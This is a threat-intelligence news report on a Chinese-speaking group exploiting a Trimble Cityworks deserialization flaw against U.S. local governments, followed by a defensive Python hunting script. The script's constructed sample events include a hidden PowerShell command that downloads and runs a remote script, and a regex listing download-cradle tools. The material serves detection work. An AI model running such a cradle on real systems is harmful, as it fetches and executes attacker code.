Chinese Cyber Attackers Target Trimble Cityworks Vulnerability to Breach U.S. Government Networks

May 22, 2025Ravie LakshmananVulnerability / Threat Intelligence

A Chinese-speaking threat actor tracked as UAT-6382 has been linked to the exploitation of a now-patched remote-code-execution vulnerability in Trimble Cityworks to deliver Cobalt Strike and VShell.

“UAT-6382 successfully exploited CVE-2025-0944, conducted reconnaissance, and rapidly deployed a variety of web shells and custom-made malware to maintain long-term access,” Cisco Talos researchers Asheer Malhotra and Brandon White said in an analysis published on May 22, 2025. “Upon gaining access, UAT-6382 expressed a clear interest in pivoting to systems related to utility management.”

The network security company said it observed the attacks targeting enterprise networks of local governing bodies in the United States starting January 2025.

CVE-2025-0944 (CVSS score: 8.6) is a deserialization-of-untrusted-data flaw in the GIS-centric asset management software that can lead to remote code execution. The vulnerability has since been patched, and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities (KEV) catalog in February 2025.

According to indicators of compromise (IoCs) released by Trimble, the vulnerability has been exploited to deliver a Rust-based loader that launches Cobalt Strike and a Go-based remote access tool named VShell in an attempt to maintain long-term access to infected systems.

Cisco Talos, which is tracking the Rust-based loader as TetraLoader, said it’s built using MaLoader, a publicly available malware-building framework written in Simplified Chinese that first appeared on GitHub in December 2024.

After exploiting the vulnerable Cityworks application, the threat actors carry out preliminary reconnaissance to identify and fingerprint the server, then drop web shells such as AntSword, chinatso/Chopper, and Behinder, all of which are widely used by Chinese hacking groups.

“UAT-6382 enumerated multiple directories on servers of interest to identify files of interest to them and then staged them in directories where they had deployed web shells for easy exfiltration,” the researchers said. “UAT-6382 downloaded and deployed multiple backdoors on compromised systems via PowerShell.”
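The post-exploitation chain Talos describes (a web shell dropped under the web root, files staged beside it for download, and backdoors pulled down with PowerShell) leaves a recognisable footprint in IIS access logs and process-creation telemetry. The script below is an added hunting example, not code from Talos, Trimble or the article; the log lines, the /cityworks/... paths, the allow-list of application script files, the IP addresses and the process events are all constructed, and the only assumption is that the application runs under the IIS worker process w3wp.exe.

```python
"""Hunt for the web shell / staging / PowerShell-download pattern described above.
Added example: all log lines, paths and events are constructed, not real IoCs."""
import re
from collections import defaultdict
from posixpath import dirname, splitext

# Constructed IIS W3C log excerpt. Field order follows the #Fields header.
IIS_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip cs(User-Agent) sc-status sc-bytes
2025-01-14 03:12:09 GET /cityworks/Login.aspx 198.51.100.7 Mozilla/5.0 200 4120
2025-01-14 03:13:02 POST /cityworks/Scripts/update.aspx 198.51.100.7 antSword/v2.1 200 312
2025-01-14 03:13:05 POST /cityworks/Scripts/update.aspx 198.51.100.7 antSword/v2.1 200 2210
2025-01-14 03:29:41 GET /cityworks/Scripts/data1.zip 198.51.100.7 Mozilla/5.0 200 58214400
2025-01-14 03:40:55 GET /cityworks/Default.aspx 203.0.113.9 Mozilla/5.0 200 9800
2025-01-14 03:41:10 POST /cityworks/Default.aspx 203.0.113.9 Mozilla/5.0 302 0
"""

# Hypothetical allow-list of script files that ship with the application.
# In practice, generate it from a known-good deployment of the same version.
BASELINE_SCRIPTS = {"/cityworks/login.aspx", "/cityworks/default.aspx"}

SCRIPT_EXT = {".aspx", ".ashx", ".asmx", ".php", ".jsp", ".jspx"}
ARCHIVE_EXT = {".zip", ".rar", ".7z", ".gz", ".tar", ".bak"}


def parse_iis(text):
    """Parse W3C extended log lines into dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows


def webshell_candidates(rows, baseline=BASELINE_SCRIPTS):
    """POSTs to server-side script files that are not part of the application.
    A dropped web shell is a script file the app never shipped that receives POSTs."""
    hits = defaultdict(set)
    for r in rows:
        uri = r["cs-uri-stem"].lower()
        if r["cs-method"] == "POST" and splitext(uri)[1] in SCRIPT_EXT and uri not in baseline:
            hits[uri].add(r["c-ip"])
    return {uri: sorted(ips) for uri, ips in hits.items()}


def staged_downloads(rows, shells, min_bytes=1_000_000):
    """Large archive downloads from a directory that holds a web shell candidate:
    the 'staged for easy exfiltration' step Talos describes."""
    shell_dirs = {dirname(u) for u in shells}
    return [r["cs-uri-stem"] for r in rows
            if r["cs-method"] == "GET"
            and splitext(r["cs-uri-stem"].lower())[1] in ARCHIVE_EXT
            and dirname(r["cs-uri-stem"].lower()) in shell_dirs
            and int(r["sc-bytes"]) >= min_bytes]


# Constructed process-creation events (Sysmon Event ID 1 shape).
PROCESS_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami && ipconfig /all"},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/s.ps1')\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
]

# Common PowerShell download-cradle and encoded-command markers.
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
                    r"|start-bitstransfer|-enc(odedcommand)?\b", re.I)


def web_spawned_shells(events):
    """Command interpreters whose parent is the IIS worker process, which is how
    commands issued through a web shell execute. Flags download cradles."""
    out = []
    for e in events:
        if not e["parent"].lower().endswith(r"\inetsrv\w3wp.exe"):
            continue
        if e["image"].lower().endswith(("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe")):
            out.append({"cmdline": e["cmdline"],
                        "download_cradle": bool(CRADLE.search(e["cmdline"]))})
    return out


if __name__ == "__main__":
    rows = parse_iis(IIS_LOG)
    shells = webshell_candidates(rows)
    print("web shell candidates:", shells)
    print("staged archives:", staged_downloads(rows, shells))
    for hit in web_spawned_shells(PROCESS_EVENTS):
        print("w3wp child:", hit)
```

On the constructed data this flags the one script file outside the allow-list (a repeated POST target from a single IP), the large archive fetched from the same directory, and the two interpreters spawned by w3wp.exe, only the second of which carries a download cradle. The allow-list approach is deliberate: web shell families change their user-agents and encodings, but a server-side script that did not ship with the application and only ever receives POSTs is a stable signal regardless of which shell was dropped.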
